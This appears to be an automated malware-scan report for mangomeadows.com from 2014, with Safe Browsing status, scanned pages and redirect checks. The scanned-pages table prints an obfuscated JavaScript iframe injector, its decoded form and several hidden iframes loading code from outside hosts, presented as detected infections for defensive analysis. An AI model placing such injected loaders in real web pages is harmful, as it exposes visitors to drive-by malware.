Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mangomeadows.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mangomeadows.com/ | 200 OK Content-Length: 6639 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) o='//';ni='2.4';ql='a.p';mh='.23';ag='p:';a='fr';wc='htt';m='i';v='hp';xj='0/';c='9.8';da='20';lq='c';q='sr';l='ame';r=m.concat(a,l);i=q.concat(lq);nj=wc.concat(ag,o,da,ni,mh,c,xj,ql,v);document.write('<'+r+' '+i+'="'+nj+'" style="position: absolute; top:-3000px; left:-3000px; visibility: hidden;"></'+r+'>'); Decoded script: <iframe src="http://202.4.239.80/a.php" style="position: absolute; top:-3000px; left:-3000px; visibility: hidden;"></iframe> Antivirus reports:
Hidden iFrame found. style: hidden src: http://newhorizonie.com.au/conn/ <iframe src="http://newhorizonie.com.au/conn/" style="position: absolute; top:-4000px; left:-4000px; visibility: hidden;"> Hidden iFrame found. style: hidden src: http://tognailbeauty.com.au/php.tmp.3607545789.php <iframe src="http://tognailbeauty.com.au/php.tmp.3607545789.php" style="position: absolute; top:-1144px; left:-3548px; visibility: hidden;"> Hidden iFrame found. style: hidden src: http://fourbestthings.com/php.tmp.2595509314.php <iframe src="http://fourbestthings.com/php.tmp.2595509314.php" style="position: absolute; top:-4799px; left:-1896px; visibility: hidden;"> Hidden iFrame found. style: hidden src: http://lotscleaner.com/php.tmp.4985971183.php <iframe src="http://lotscleaner.com/php.tmp.4985971183.php" style="position: absolute; top:-1921px; left:-2395px; visibility: hidden;"> Hidden iFrame found. style: hidden src: http://stardivine.com/php.tmp.7207062425.php <iframe src="http://stardivine.com/php.tmp.7207062425.php" style="position: absolute; top:-3606px; left:-2070px; visibility: hidden;"> | ||
http://j.maxmind.com/app/geoip.js | 404 Not Found Content-Length: 162 Content-Type: text/html | clean |
http://j.maxmind.com/test404page.js | 404 Not Found Content-Length: 522 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mangomeadows.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 20:18:23 GMT
Accept-Ranges: bytes
ETag: "98327c-19ef-4e69d0a1a7fc9"
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 6639
Content-Type: text/html
Last-Modified: Tue, 17 Sep 2013 23:54:20 GMT
...6639 bytes of data.
GET / HTTP/1.1
Host: mangomeadows.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 20:18:23 GMT
Accept-Ranges: bytes
ETag: "98327c-19ef-4e69d0a1a7fc9"
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 6639
Content-Type: text/html
Last-Modified: Tue, 17 Sep 2013 23:54:20 GMT
...6639 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mangomeadows.com
Referer: http://www.google.com/search?q=mangomeadows.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mangomeadows.com
Referer: http://www.google.com/search?q=mangomeadows.com
Result:
The result is similar to the first query. There are no suspicious redirects found.